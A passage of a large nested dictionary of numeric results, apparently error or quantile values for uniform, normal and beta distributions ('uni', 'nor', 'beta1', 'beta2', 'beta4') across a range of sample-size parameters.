'beta2': 0.10696078885236882, 'beta4': 0.040016846887239776}, 500: {'uni': 0.06056262216642466, 'nor': 0.09643747097853617, 'beta1': 0.060400676674767784, 'beta2': 0.11473400680347212, 'beta4': 0.04951486955132711}, 400: {'uni': 0.06764529037263078, 
'nor': 0.10144512010371015, 'beta1': 0.06753205660512529, 'beta2': 0.11877629190302957, 'beta4': 0.05635636540840383}, 300: {'uni': 0.07833927823257347, 'nor': 0.10837393046444554, 'beta1': 0.07800217882792032, 'beta2': 0.12395861166633126, 'beta4': 0.06599964488218174}, 200: {'uni': 0.09545996993358469, 'nor': 0.12238507175537305, 'beta1': 0.09520988149732268, 'beta2': 0.13705221967657688, 'beta4': 0.0834232463067639}, 150: {'uni': 0.10950500818109843, 'nor': 0.13336780634865708, 'beta1': 0.10925207483454008, 'beta2': 0.14838697874181017, 'beta4': 0.09817686727672598}, 100: {'uni': 0.13308106007624088, 'nor': 0.15584852299459984, 'beta1': 0.13507681514120773, 'beta2': 0.16768636533102133, 'beta4': 0.12178061197560497}, 75: {'uni': 0.15418797319776234, 'nor': 0.17295736209751258, 'beta1': 0.154058224278319, 'beta2': 0.1837034986222184, 'beta4': 0.14349011466146278}, 50: {'uni': 0.18847911332805245, 'nor': 0.20361778090060745, 'beta1': 0.1875078531942039, 'beta2': 0.21225663088149105, 'beta4': 0.17857036568803114}, 30: {'uni': 0.24059443804418118, 'nor': 0.2533108674087146, 'beta1': 0.24179550981403275, 'beta2': 0.26178390187576706, 'beta4': 0.23390865892313567}, 20: {'uni': 0.2937042322632649, 'nor': 0.3041869530968494, 'beta1': 0.29418747362409225, 'beta2': 0.3085038537053799, 'beta4': 0.28520167726380585}, 10: {'uni': 0.4096756554001893, 'nor': 0.4139326107135924, 'beta1': 0.40764137118865473, 'beta2': 0.4204038401226778, 'beta4': 0.40388108256901817}}, 100: {1000: {'uni': 0.04342664844495059, 'nor': 0.09884840155194324, 'beta1': 0.04276716681381737, 'beta2': 0.11054081774012758, 'beta4': 0.03371827577803044}, 750: {'uni': 0.049919916608987536, 'nor': 0.10252531304078716, 'beta1': 0.049091134507803946, 'beta2': 0.11423138192179594, 'beta4': 0.039323577549201905}, 500: {'uni': 0.06043645792785113, 'nor': 0.10917860950531716, 'beta1': 0.06024574518941972, 'beta2': 0.12114708952686687, 'beta4': 0.04863716851296296}, 400: {'uni': 0.06810271497020282, 'nor': 
0.11445445573077262, 'beta1': 0.0680246885765276, 'beta2': 0.12474816718751847, 'beta4': 0.05470345449215924}, 300: {'uni': 0.07806624398748752, 'nor': 0.12160241052743598, 'beta1': 0.07813676478342219, 'beta2': 0.1303621178249335, 'beta4': 0.06435103186819638}, 200: {'uni': 0.09516451469508691, 'nor': 0.13371593064376386, 'beta1': 0.09486007398939739, 'beta2': 0.14197473394490534, 'beta4': 0.08070835746272365}, 150: {'uni': 0.10951349007838795, 'nor': 0.1448092189751769, 'beta1': 0.11000810280674456, 'beta2': 0.15405644251908213, 'beta4': 0.09448304115287848}, 100: {'uni': 0.13402144727255166, 'nor': 0.16360851635146456, 'beta1': 0.13373829847036145, 'beta2': 0.17388573367926863, 'beta4': 0.11887279870190737}, 75: {'uni': 0.1534775863899963, 'nor': 0.18082984868868635, 'beta1': 0.15472434640745825, 'beta2': 0.18922729311202852, 'beta4': 0.14064103105650327}, 50: {'uni': 0.1878076047125296, 'nor': 0.21174139971723732, 'beta1': 0.18900505952391644, 'beta2': 0.21597325299721343, 'beta4': 0.17504570451647083}, 30: {'uni': 0.24109983939699636, 'nor': 0.26128460107527085, 'beta1': 0.24202652974714423, 'beta2': 0.26394060641591655, 'beta4': 0.22998071380591711}, 20: {'uni': 0.29266727403084003, 'nor': 0.3103114840471122, 'beta1': 0.29512024524547165, 'beta2': 0.31286929353450027, 'beta4': 0.2848189838493475}, 10: {'uni': 0.4067165104704334, 'nor': 0.4189143169125569, 'beta1': 0.4090630015368414, 'beta2': 0.42152641633430715, 'beta4': 0.4002321833577583}}, 75: {1000: {'uni': 0.0438399424685616, 'nor': 0.11214377089086885, 'beta1': 0.04280400130427986, 'beta2': 0.11639932218811577, 'beta4': 0.033393127995971994}, 750: {'uni': 0.050249501777054006, 'nor': 0.11453879357778812, 'beta1': 0.0491045026978259, 'beta2': 0.12063794198664923, 'beta4': 0.03872341367170215}, 500: {'uni': 0.06108895227688799, 'nor': 0.12072978462890072, 'beta1': 0.0601270340866209, 'beta2': 0.12562241974534927, 'beta4': 0.04827155944884867}, 400: {'uni': 0.06782565480281566, 'nor': 0.12548350271549236, 
'beta1': 0.06724131663497068, 'beta2': 0.12960446320697638, 'beta4': 0.05409657961615677}, 300: {'uni': 0.07851141408408377, 'nor': 0.13200511669657544, 'beta1': 0.077898151231101, 'beta2': 0.13654271371225812, 'beta4': 0.0637511735240166}, 200: {'uni': 0.09475898024659712, 'nor': 0.14327147451372735, 'beta1': 0.09501686919706781, 'beta2': 0.14759803188477688, 'beta4': 0.07871855013071921}, 150: {'uni': 0.10925599343816059, 'nor': 0.15297899030445272, 'beta1': 0.11015254323591961, 'beta2': 0.15768755238961485, 'beta4': 0.09295209765219048}, 100: {'uni': 0.13396368251923452, 'nor': 0.17179721647955526, 'beta1': 0.13345037859887932, 'beta2': 0.17765805845455007, 'beta4': 0.11642943784237603}, 75: {'uni': 0.15477736670546938, 'nor': 0.18895714897457644, 'beta1': 0.1539493080965768, 'beta2': 0.19447171707960897, 'beta4': 0.13724563488543373}, 50: {'uni': 0.18839002568598873, 'nor': 0.2180305171258889, 'beta1': 0.18831553334906875, 'beta2': 0.22129833914948438, 'beta4': 0.17275056471332206}, 30: {'uni': 0.24008961544263907, 'nor': 0.2650822786621322, 'beta1': 0.24252815499954994, 'beta2': 0.2688272811098853, 'beta4': 0.22663105019759328}, 20: {'uni': 0.2921433063597944, 'nor': 0.3141023199173227, 'beta1': 0.29340687139823474, 'beta2': 0.31266965958300064, 'beta4': 0.2804024303421781}, 10: {'uni': 0.41107290577052813, 'nor': 0.4263383340359735, 'beta1': 0.40828688918554545, 'beta2': 0.4250783970409252, 'beta4': 0.3988900709580016}}, 50: {1000: {'uni': 0.045319055803388075, 'nor': 0.13372164617361332, 'beta1': 0.042622363121129214, 'beta2': 0.13054115789301413, 'beta4': 0.03301256635793812}, 750: {'uni': 0.05163228099424677, 'nor': 0.1349664254862753, 'beta1': 0.0496423021703164, 'beta2': 0.13446750687108505, 'beta4': 0.0385279485772233}, 500: {'uni': 0.061439306229550794, 'nor': 0.14055103421779302, 'beta1': 0.060142216296224515, 'beta2': 0.13752593042865568, 'beta4': 0.04724339812053602}, 400: {'uni': 0.0693663795699413, 'nor': 0.14556747938193393, 'beta1': 
0.06738356899478581, 'beta2': 0.14143610440720644, 'beta4': 0.053576307903667963}, 300: {'uni': 0.07864177620663654, 'nor': 0.15022792976856758, 'beta1': 0.07821473255565609, 'beta2': 0.1478580791021359, 'beta4': 0.06262935931375649}, 200: {'uni': 0.0953862720353692, 'nor': 0.1622200125881057, 'beta1': 0.09603404932034854, 'beta2': 0.15816299759409325, 'beta4': 0.0773943582431677}, 150: {'uni': 0.11002583704405877, 'nor': 0.17113991351179697, 'beta1': 0.10936894301480282, 'beta2': 0.1687178421219161, 'beta4': 0.09028525692400177}, 100: {'uni': 0.13401450754618016, 'nor': 0.1895698802210114, 'beta1': 0.1344582332361554, 'beta2': 0.18419709322450312, 'beta4': 0.11379130616549382}, 75: {'uni': 0.15488258558714707, 'nor': 0.20362572995006806, 'beta1': 0.1539002041533405, 'beta2': 0.20128361931559535, 'beta4': 0.1333671945439988}, 50: {'uni': 0.18840791165484855, 'nor': 0.23257306685125415, 'beta1': 0.18867436580219135, 'beta2': 0.22835957658151024, 'beta4': 0.16757432345808926}, 30: {'uni': 0.24023168620563118, 'nor': 0.27904847253128273, 'beta1': 0.24006751123167158, 'beta2': 0.2727595659081496, 'beta4': 0.22275659673727644}, 20: {'uni': 0.2940018318983334, 'nor': 0.32479532584592363, 'beta1': 0.2929946618763485, 'beta2': 0.3206467179138732, 'beta4': 0.2753491673001646}, 10: {'uni': 0.4065488810708842, 'nor': 0.43093738566136636, 'beta1': 0.4064636440527985, 'beta2': 0.42567627450176926, 'beta4': 0.3935956418408144}}, 30: {1000: {'uni': 0.04968157954456354, 'nor': 0.1696151004367587, 'beta1': 0.04281863132067795, 'beta2': 0.14689302839678564, 'beta4': 0.03311442937738629}, 750: {'uni': 0.055574487451747534, 'nor': 0.17246364021137395, 'beta1': 0.04952430388104273, 'beta2': 0.15046099536657231, 'beta4': 0.038285428923678255}, 500: {'uni': 0.06478088254077552, 'nor': 0.1737409366264756, 'beta1': 0.0602313802132467, 'beta2': 0.15517477082552145, 'beta4': 0.047192612626946184}, 400: {'uni': 0.07143398822894637, 'nor': 0.1789456292964713, 'beta1': 0.06778902728856115, 
'beta2': 0.15742066713207048, 'beta4': 0.05282205994257394}, 300: {'uni': 0.08082785446492691, 'nor': 0.1824810151126436, 'beta1': 0.07787606767722169, 'beta2': 0.16276174102685503, 'beta4': 0.06159728641016676}, 200: {'uni': 0.0974108225516378, 'nor': 0.19235380984611056, 'beta1': 0.09543113477422605, 'beta2': 0.17283803046058355, 'beta4': 0.07550424392452293}, 150: {'uni': 0.11141405928139247, 'nor': 0.20191035833451154, 'beta1': 0.10938230867137078, 'beta2': 0.1820889616226289, 'beta4': 0.08762848356724207}, 100: {'uni': 0.13493046831910993, 'nor': 0.21701554067653117, 'beta1': 0.13386778798076912, 'beta2': 0.19508747959897582, 'beta4': 0.11093409043298663}, 75: {'uni': 0.15528958618348487, 'nor': 0.2299457189815397, 'beta1': 0.15409095027566755, 'beta2': 0.2109482892562924, 'beta4': 0.12881215324966622}, 50: {'uni': 0.18842291872138123, 'nor': 0.2584487077125532, 'beta1': 0.18890320722823578, 'beta2': 0.23827797918175672, 'beta4': 0.16158273294453834}, 30: {'uni': 0.2398366149463353, 'nor': 0.2980088771871361, 'beta1': 0.24200577319830247, 'beta2': 0.28238021073320035, 'beta4': 0.21498111468517844}, 20: {'uni': 0.29227132801590716, 'nor': 0.34432255002709555, 'beta1': 0.2914850392665248, 'beta2': 0.32585452654798963, 'beta4': 0.2669285712544458}, 10: {'uni': 0.40609305573179105, 'nor': 0.447820015199636, 'beta1': 0.40782948526995666, 'beta2': 0.42757111844224754, 'beta4': 0.3886693622267199}}, 20: {1000: {'uni': 0.05775001007007219, 'nor': 0.20319134519921084, 'beta1': 0.048129745899927925, 'beta2': 0.1658497799626829, 'beta4': 0.0329367295696176}, 750: {'uni': 0.062124231199756075, 'nor': 0.20860283378380778, 'beta1': 0.04983248111631, 'beta2': 0.16830562563830098, 'beta4': 0.03824865513096315}, 500: {'uni': 0.0705024643008979, 'nor': 0.21381602181117743, 'beta1': 0.06065658795610929, 'beta2': 0.17239927975361702, 'beta4': 0.04679865268868699}, 400: {'uni': 0.0761771420430718, 'nor': 0.21385203271203002, 'beta1': 0.06752239679804717, 'beta2': 
0.17470111438116842, 'beta4': 0.05231551861903025}, 300: {'uni': 0.08596884925259118, 'nor': 0.21991598100008408, 'beta1': 0.07755871126605102, 'beta2': 0.179198373732674, 'beta4': 0.06068391139230339}, 200: {'uni': 0.10080581963801893, 'nor': 0.22897240194696655, 'beta1': 0.09573721958215525, 'beta2': 0.18553633863631513, 'beta4': 0.07462617121595846}, 150: {'uni': 0.114468804467043, 'nor': 0.23631664987390277, 'beta1': 0.10962036209737869, 'beta2': 0.1966018010006519, 'beta4': 0.0870041079920092}, 100: {'uni': 0.13665630970632198, 'nor': 0.2515883777222933, 'beta1': 0.1336228418007765, 'beta2': 0.20881550687413342, 'beta4': 0.10773682421715106}, 75: {'uni': 0.15695962977063316, 'nor': 0.2603016829084427, 'beta1': 0.15508110679604847, 'beta2': 0.22376688776132403, 'beta4': 0.125626481557148}, 50: {'uni': 0.18798876388799624, 'nor': 0.2849538127709019, 'beta1': 0.18882535166765735, 'beta2': 0.24974430328165448, 'beta4': 0.158008406145491}, 30: {'uni': 0.23998853919104884, 'nor': 0.3219977260938881, 'beta1': 0.24135680518002922, 'beta2': 0.2899857898675655, 'beta4': 0.20763359812674523}, 20: {'uni': 0.292373057732106, 'nor': 0.3655787731698917, 'beta1': 0.2924979299262157, 'beta2': 0.3319078417717419, 'beta4': 0.2608606590647614}, 10: {'uni': 0.4061016266543868, 'nor': 0.4671521171088977, 'beta1': 0.4096525764106935, 'beta2': 0.4345673196704135, 'beta4': 0.37937846970295347}}, 10: {1000: {'uni': 0.0913473264369822, 'nor': 0.2964728394162681, 'beta1': 0.09100152658005456, 'beta2': 0.20242925737599682, 'beta4': 0.032700600789628664}, 750: {'uni': 0.09326085272482565, 'nor': 0.29554795490186203, 'beta1': 0.09103352579316204, 'beta2': 0.20619044529626096, 'beta4': 0.037829259115970404}, 500: {'uni': 0.0971331647876415, 'nor': 0.30097993907808684, 'beta1': 0.091049904849404, 'beta2': 0.20699779845573962, 'beta4': 0.04650399550454862}, 400: {'uni': 0.1003597113284248, 'nor': 0.30233932585089107, 'beta1': 0.09107096529100855, 'beta2': 0.20830655812948695, 'beta4': 
0.051895391977686056}, 300: {'uni': 0.10721764330695623, 'nor': 0.3073271090395088, 'beta1': 0.09112836953131596, 'beta2': 0.21402715597956734, 'beta4': 0.06001640083268511}, 200: {'uni': 0.11805616667496477, 'nor': 0.3147831503605935, 'beta1': 0.09648796317997815, 'beta2': 0.22109533500255907, 'beta4': 0.07370742701518179}, 150: {'uni': 0.12810610943312417, 'nor': 0.32062575553585454, 'beta1': 0.1103702654857096, 'beta2': 0.22691351867751697, 'beta4': 0.08545929847308015}, 100: {'uni': 0.14756617194854993, 'nor': 0.33197543815379127, 'beta1': 0.135132358543155, 'beta2': 0.23880036275598282, 'beta4': 0.1050005710193368}, 75: {'uni': 0.1661626166131514, 'nor': 0.34126609250236845, 'beta1': 0.15438638517404316, 'beta2': 0.2499089973779972, 'beta4': 0.12149147312793035}, 50: {'uni': 0.19583204530592255, 'nor': 0.3545594670011578, 'beta1': 0.18672230934909217, 'beta2': 0.2730457458179122, 'beta4': 0.1512119547385279}, 30: {'uni': 0.2435600610386478, 'nor': 0.39653189875476424, 'beta1': 0.2404639573254724, 'beta2': 0.3066180700113161, 'beta4': 0.19739374662116618}, 20: {'uni': 0.2932263659568272, 'nor': 0.4283833265615067, 'beta1': 0.29077513214843564, 'beta2': 0.3504847489217736, 'beta4': 0.24789858189847203}, 10: {'uni': 0.4059510050471383, 'nor': 0.51847323520602, 'beta1': 0.40531924075862663, 'beta2': 0.442169996022317, 'beta4': 0.3597039082336214}}}, 0.1: {1000: {1000: {'uni': 0.03865579099473948, 'nor': 0.04689323213481217, 'beta1': 0.03864443104847837, 'beta2': 0.06928001273732087, 'beta4': 0.034746385826709525}, 750: {'uni': 0.04431178998702129, 'nor': 0.05154757047623354, 'beta1': 0.04471651202934612, 'beta2': 0.07068001177091865, 'beta4': 0.04061642187839365}, 500: {'uni': 0.05449621343988875, 'nor': 0.06052185385730591, 'beta1': 0.054284378799021704, 'beta2': 0.07627185785494306, 'beta4': 0.05066709479143283}, 400: {'uni': 0.06094293297893738, 'nor': 0.06655379885026683, 'beta1': 0.06063207438253193, 'beta2': 0.0805230789692084, 'beta4': 
0.057268551423413916}, 300: {'uni': 0.07035612682535114, 'nor': 0.07484946592814268, 'beta1': 0.07012629576924828, 'beta2': 0.08695683101854024, 'beta4': 0.06723411467423446}, 200: {'uni': 0.0856850266615582, 'nor': 0.08920392339205196, 'beta1': 0.08598961798425064, 'beta2': 0.09957077044100182, 'beta4': 0.0828676651996616}, 150: {'uni': 0.09851344951124391, 'nor': 0.10245978909640735, 'beta1': 0.09874089203017197, 'beta2': 0.11143243172461781, 'beta4': 0.09626599766980459}, 100: {'uni': 0.1210111549309712, 'nor': 0.12298171658155477, 'beta1': 0.12043414875564495, 'beta2': 0.1308096653595, 'beta4': 0.11838570937570658}, 75: {'uni': 0.13938671579559747, 'nor': 0.14217000359022663, 'beta1': 0.138725193479173, 'beta2': 0.1471890814905698, 'beta4': 0.1371285598122392}, 50: {'uni': 0.16966268801360024, 'nor': 0.17032733000500144, 'beta1': 0.16965634639647975, 'beta2': 0.17659318599354473, 'beta4': 0.16779361043827323}, 30: {'uni': 0.21937716053448017, 'nor': 0.2191535761895615, 'beta1': 0.21730939148151623, 'beta2': 0.22312364454880895, 'beta4': 0.21786573953931154}, 20: {'uni': 0.26624534959584256, 'nor': 0.2653268175644278, 'beta1': 0.26474433641392037, 'beta2': 0.26812009306025597, 'beta4': 0.26194067601195037}, 10: {'uni': 0.36801398201907515, 'nor': 0.3709069141739802, 'beta1': 0.3668592370274731, 'beta2': 0.37064040545123844, 'beta4': 0.36704323242150666}}, 750: {1000: {'uni': 0.038578042981164296, 'nor': 0.048914303251900604, 'beta1': 0.03853302192863617, 'beta2': 0.0688056514749229, 'beta4': 0.0338622699562493}, 750: {'uni': 0.04442141557686974, 'nor': 0.05374944654503383, 'beta1': 0.044374748815966814, 'beta2': 0.07026684762315227, 'beta4': 0.03979048728222595}, 500: {'uni': 0.054286956718598955, 'nor': 0.06212763227553719, 'beta1': 0.054253588244283946, 'beta2': 0.07656236068086564, 'beta4': 0.049939942721689445}, 400: {'uni': 0.06083366825985448, 'nor': 0.06788419585350336, 'beta1': 0.060660028681503775, 'beta2': 0.08068669745769219, 'beta4': 
0.05675736877098636}, 300: {'uni': 0.06993166265169576, 'nor': 0.07680384961751496, 'beta1': 0.07010161417489508, 'beta2': 0.0880572291137307, 'beta4': 0.06596363343773998}, 200: {'uni': 0.0851211251657536, 'nor': 0.09099559217968667, 'beta1': 0.08536971610728128, 'beta2': 0.10062359974481189, 'beta4': 0.08250279408907268}, 150: {'uni': 0.09831231905867402, 'nor': 0.10383736756173939, 'beta1': 0.09899967339806359, 'beta2': 0.11139402129433418, 'beta4': 0.09586157739072232}, 100: {'uni': 0.12095357943723123, 'nor': 0.12436567324838821, 'beta1': 0.12052591808871516, 'beta2': 0.13100845891806429, 'beta4': 0.11773670273834078}, 75: {'uni': 0.13940484887133242, 'nor': 0.14155145908354727, 'beta1': 0.13837916177477272, 'beta2': 0.14796493865747803, 'beta4': 0.13654473331430828}, 50: {'uni': 0.16894951238844866, 'nor': 0.17265459646884784, 'beta1': 0.16961105932607348, 'beta2': 0.17656490288692311, 'beta4': 0.1674972244617925}, 30: {'uni': 0.21651765294813125, 'nor': 0.21939168771962442, 'beta1': 0.21729204037445293, 'beta2': 0.22349957660235154, 'beta4': 0.21623428560039515}, 20: {'uni': 0.2642786935555307, 'nor': 0.2675799785148938, 'beta1': 0.26561099996019183, 'beta2': 0.2691253631613714, 'beta4': 0.2645344136768742}, 10: {'uni': 0.3695291099836718, 'nor': 0.3711051681589676, 'beta1': 0.37110270903505804, 'beta2': 0.3730098056299037, 'beta4': 0.3662152768074211}}, 500: {1000: {'uni': 0.03836341807194299, 'nor': 0.05288441357758422, 'beta1': 0.03855355377252884, 'beta2': 0.07246101460269183, 'beta4': 0.03331891444897561}, 750: {'uni': 0.0444146556451972, 'nor': 0.05765382477238595, 'beta1': 0.04441014342661165, 'beta2': 0.07465473765203068, 'beta4': 0.03861388373348723}, 500: {'uni': 0.05438833618427541, 'nor': 0.06550856448266529, 'beta1': 0.05429312306612194, 'beta2': 0.08110283704211807, 'beta4': 0.048644471904955966}, 400: {'uni': 0.06077670141165842, 'nor': 0.07181845544231241, 'beta1': 0.06061997617710235, 'beta2': 0.08578519852772415, 'beta4': 
0.05521030797490445}, 300: {'uni': 0.07041595748509133, 'nor': 0.07946505900730128, 'beta1': 0.0704016017009636, 'beta2': 0.09209979263017587, 'beta4': 0.06483174788141038}, 200: {'uni': 0.08563012945992199, 'nor': 0.0940723299141569, 'beta1': 0.08541074081441047, 'beta2': 0.10458447320510883, 'beta4': 0.08098282824897673}, 150: {'uni': 0.09899026948327977, 'nor': 0.10562357103466236, 'beta1': 0.09861292652287168, 'beta2': 0.11632528204922898, 'beta4': 0.0940489883300496}, 100: {'uni': 0.12076176494614121, 'nor': 0.1257258205330381, 'beta1': 0.12054780424559441, 'beta2': 0.13468669896864294, 'beta4': 0.11652043544137913}, 75: {'uni': 0.13920364976539873, 'nor': 0.1451998235260331, 'beta1': 0.13872567771909045, 'beta2': 0.15128300093267993, 'beta4': 0.13571279744636144}, 50: {'uni': 0.16954390111422946, 'nor': 0.172692463113301, 'beta1': 0.1693168682908624, 'beta2': 0.17976834049282708, 'beta4': 0.16609850304544527}, 30: {'uni': 0.21709640413871756, 'nor': 0.22184138531054348, 'beta1': 0.21757402187586894, 'beta2': 0.22444521991819788, 'beta4': 0.21392411551684015}, 20: {'uni': 0.2636520645162054, 'nor': 0.26652594436945887, 'beta1': 0.265223822071589, 'beta2': 0.2721218328512449, 'beta4': 0.2627686738338032}, 10: {'uni': 0.36726905749678107, 'nor': 0.3699346949326602, 'beta1': 0.36849489074859143, 'beta2': 0.3705089961045096, 'beta4': 0.3683244510638542}}, 400: {1000: {'uni': 0.038671955406556435, 'nor': 0.055340672020988524, 'beta1': 0.03839858850395489, 'beta2': 0.07292338725212977, 'beta4': 0.032563312918836074}, 750: {'uni': 0.04481109074042289, 'nor': 0.05989416561151395, 'beta1': 0.04447627902390899, 'beta2': 0.07495569974438154, 'beta4': 0.03825050788799533}, 500: {'uni': 0.05452739978724558, 'nor': 0.06844117462965149, 'beta1': 0.05427711866364415, 'beta2': 0.08075667657637409, 'beta4': 0.04799001758839683}, 400: {'uni': 0.0611511660781307, 'nor': 0.07331590982555752, 'beta1': 0.060592106128168455, 'beta2': 0.08541781550168484, 'beta4': 
0.05429207860179752}, 300: {'uni': 0.07033185789840113, 'nor': 0.08155939051842442, 'beta1': 0.07020664995088899, 'beta2': 0.09207127639350217, 'beta4': 0.06368267547644724}, 200: {'uni': 0.08544638993146081, 'nor': 0.09571715041830708, 'beta1': 0.08570866106209285, 'beta2': 0.10630400769293069, 'beta4': 0.08024458505578957}, 150: {'uni': 0.09829333569563875, 'nor': 0.10653764892501733, 'beta1': 0.09928267092865872, 'beta2': 0.11707715788245693, 'beta4': 0.09396885720717318}, 100: {'uni': 0.12080421136273911, 'nor': 0.12821500349277992, 'beta1': 0.12103112779938607, 'beta2': 0.13533651452822992, 'beta4': 0.11606955631404037}, 75: {'uni': 0.13856046617279955, 'nor': 0.1448041375046114, 'beta1': 0.13960085219794205, 'beta2': 0.152159478857264, 'beta4': 0.13494084962417124}, 50: {'uni': 0.1693496286995576, 'nor': 0.17474469922632208, 'beta1': 0.16895412831719117, 'beta2': 0.17830731451150195, 'beta4': 0.1659480783288083}, 30: {'uni': 0.21819978784843835, 'nor': 0.2231518999196621, 'beta1': 0.21831546700467166, 'beta2': 0.2266742699981823, 'beta4': 0.21494937232251626}, 20: {'uni': 0.2667842124402274, 'nor': 0.2684191444539494, 'beta1': 0.2645995976816778, 'beta2': 0.27338561154866864, 'beta4': 0.26360661161857973}, 10: {'uni': 0.3669373614601618, 'nor': 0.37176690566406345, 'beta1': 0.3677474444699915, 'beta2': 0.3747266621010322, 'beta4': 0.3684049267602626}}, 300: {1000: {'uni': 0.038568146042191165, 'nor': 0.06033077287311639, 'beta1': 0.03858815015821093, 'beta2': 0.07552788266669708, 'beta4': 0.032200314601627644}, 750: {'uni': 0.04470027622900535, 'nor': 0.06449447691372501, 'beta1': 0.04445980130759988, 'beta2': 0.07824363987830985, 'beta4': 0.037629338463132156}, 500: {'uni': 0.05445235908316243, 'nor': 0.07219718892016075, 'beta1': 0.054262938865397015, 'beta2': 0.08422237701364471, 'beta4': 0.047142226840530044}, 400: {'uni': 0.06066467596958125, 'nor': 0.07755227668883014, 'beta1': 0.060492785543729444, 'beta2': 0.08820282905569876, 'beta4': 
0.0537567311081823}, 300: {'uni': 0.06977557375995519, 'nor': 0.08485533637785325, 'beta1': 0.06951934425266007, 'beta2': 0.09812061998557053, 'beta4': 0.06253013614048619}, 200: {'uni': 0.085560824769008, 'nor': 0.09806835521037083, 'beta1': 0.08569790505589447, 'beta2': 0.10952789442497846, 'beta4': 0.07876260453935757}, 150: {'uni': 0.09861884343747088, 'nor': 0.10976436498857722, 'beta1': 0.09868041617950538, 'beta2': 0.11941996964693702, 'beta4': 0.09215823777804794}, 100: {'uni': 0.12082163981848504, 'nor': 0.12942192768323635, 'beta1': 0.12068117757143665, 'beta2': 0.1385783464518442, 'beta4': 0.11497977710795462}, 75: {'uni': 0.1387394671775295, 'nor': 0.14749930743714523, 'beta1': 0.13839845771793613, 'beta2': 0.15556474644945018, 'beta4': 0.13341435974554122}, 50: {'uni': 0.1697760858230185, 'nor': 0.17696687496485167, 'beta1': 0.17005727177394436, 'beta2': 0.18213762748458961, 'beta4': 0.16456011116133662}, 30: {'uni': 0.21841433839440783, 'nor': 0.22294642276220844, 'beta1': 0.21767910026340637, 'beta2': 0.2267095097296688, 'beta4': 0.21367190022853494}, 20: {'uni': 0.26434835889323316, 'nor': 0.2703508019917835, 'beta1': 0.2657962071894101, 'beta2': 0.27291680141430064, 'beta4': 0.2608999363528367}, 10: {'uni': 0.366851595427454, 'nor': 0.3698626345274391, 'beta1': 0.3671514175821456, 'beta2': 0.3737902254897134, 'beta4': 0.36667318670050814}}, 200: {1000: {'uni': 0.03854748922549689, 'nor': 0.06826609819066709, 'beta1': 0.038509650033551, 'beta2': 0.08137799639220133, 'beta4': 0.03162300254061415}, 750: {'uni': 0.04473955552343811, 'nor': 0.07200790785222766, 'beta1': 0.04438496783157364, 'beta2': 0.08407305489878691, 'beta4': 0.03667915924788884}, 500: {'uni': 0.054603748253756024, 'nor': 0.07895892719006692, 'beta1': 0.05455329073640525, 'beta2': 0.09050017429835211, 'beta4': 0.0460887620966024}, 400: {'uni': 0.06068150539987971, 'nor': 0.08357529343486114, 'beta1': 0.0607004483760466, 'beta2': 0.09547446895325118, 'beta4': 0.052385584132791485}, 
300: {'uni': 0.06982758157167712, 'nor': 0.0910022478908723, 'beta1': 0.06999218391151302, 'beta2': 0.10311006289652225, 'beta4': 0.06142711299550374}, 200: {'uni': 0.0850781158120894, 'nor': 0.10365599068508824, 'beta1': 0.08590109771629173, 'beta2': 0.1149287508099453, 'beta4': 0.0770323488052646}, 150: {'uni': 0.0993944312574237, 'nor': 0.11435325767762983, 'beta1': 0.09924451816247526, 'beta2': 0.12522181631529639, 'beta4': 0.09022268035640774}, 100: {'uni': 0.1200373195770541, 'nor': 0.1336212549639687, 'beta1': 0.12101160493161028, 'beta2': 0.14360115025497422, 'beta4': 0.11282854715360996}, 75: {'uni': 0.13803069827511782, 'nor': 0.15135686336876558, 'beta1': 0.13969975342935437, 'beta2': 0.1581734543425124, 'beta4': 0.1311769883842281}, 50: {'uni': 0.17000076548600052, 'nor': 0.18005695698050672, 'beta1': 0.16957807122266255, 'beta2': 0.18526189089470024, 'beta4': 0.1623745159068773}, 30: {'uni': 0.2185664583080269, 'nor': 0.22568866441722213, 'beta1': 0.21591449849525435, 'beta2': 0.23093983759970643, 'beta4': 0.213118806872053}, 20: {'uni': 0.26291321552377933, 'nor': 0.27125311697510335, 'beta1': 0.265078403464129, 'beta2': 0.2748140209145749, 'beta4': 0.25847640298998725}, 10: {'uni': 0.3701815312790644, 'nor': 0.3735972474840512, 'beta1': 0.36772406840807353, 'beta2': 0.37422364182301204, 'beta4': 0.36496493955486975}}, 150: {1000: {'uni': 0.038671137731641714, 'nor': 0.07489217671007431, 'beta1': 0.038714599773274294, 'beta2': 0.08587393355161688, 'beta4': 0.031043016499080256}, 750: {'uni': 0.04433800928987097, 'nor': 0.07869757447476963, 'beta1': 0.04435075697917096, 'beta2': 0.0888959352720804, 'beta4': 0.0363140391204399}, 500: {'uni': 0.05430754404756716, 'nor': 0.08479608059147858, 'beta1': 0.05449721924927653, 'beta2': 0.09800285567074296, 'beta4': 0.04543347855755667}, 400: {'uni': 0.060705891345482654, 'nor': 0.08917510453779187, 'beta1': 0.060434538413570604, 'beta2': 0.10037917578431343, 'beta4': 0.051204096787690445}, 300: {'uni': 
0.07049246163826528, 'nor': 0.09606124979171526, 'beta1': 0.07009292436806885, 'beta2': 0.1069080677782065, 'beta4': 0.05999502715904392}, 200: {'uni': 0.08586052698148705, 'nor': 0.10900056975883626, 'beta1': 0.08626264567064978, 'beta2': 0.11987083383282779, 'beta4': 0.07554909088250805}, 150: {'uni': 0.09875402367188635, 'nor': 0.11962698211682443, 'beta1': 0.09823214833546662, 'beta2': 0.12903038650506438, 'beta4': 0.08871159962248731}, 100: {'uni': 0.12052514898174571, 'nor': 0.13889683791136048, 'beta1': 0.12060529630888162, 'beta2': 0.14704712969881378, 'beta4': 0.11045343255041773}, 75: {'uni': 0.1384992792451861, 'nor': 0.15478420535093318, 'beta1': 0.13894749406062784, 'beta2': 0.1622177087017118, 'beta4': 0.12957103132509315}, 50: {'uni': 0.1696445420380115, 'nor': 0.1826703268000962, 'beta1': 0.16956250951500046, 'beta2': 0.18912522574118165, 'beta4': 0.16076304630746918}, 30: {'uni': 0.21708843420467044, 'nor': 0.22747076876879424, 'beta1': 0.2162197472621421, 'beta2': 0.23011438026305547, 'beta4': 0.21038257831299034}, 20: {'uni': 0.2635940728771885, 'nor': 0.27181622559884444, 'beta1': 0.2656550529386193, 'beta2': 0.27590232647329493, 'beta4': 0.2610592031194704}, 10: {'uni': 0.36957283113407985, 'nor': 0.3755749715318515, 'beta1': 0.3694332288882942, 'beta2': 0.3745828156724571, 'beta4': 0.362866754497916}}, 100: {1000: {'uni': 0.0391852789896201, 'nor': 0.08748278815593058, 'beta1': 0.03835204486107713, 'beta2': 0.09059314017831821, 'beta4': 0.030871329427173577}, 750: {'uni': 0.04487620054963998, 'nor': 0.09008413022094708, 'beta1': 0.044419301053983895, 'beta2': 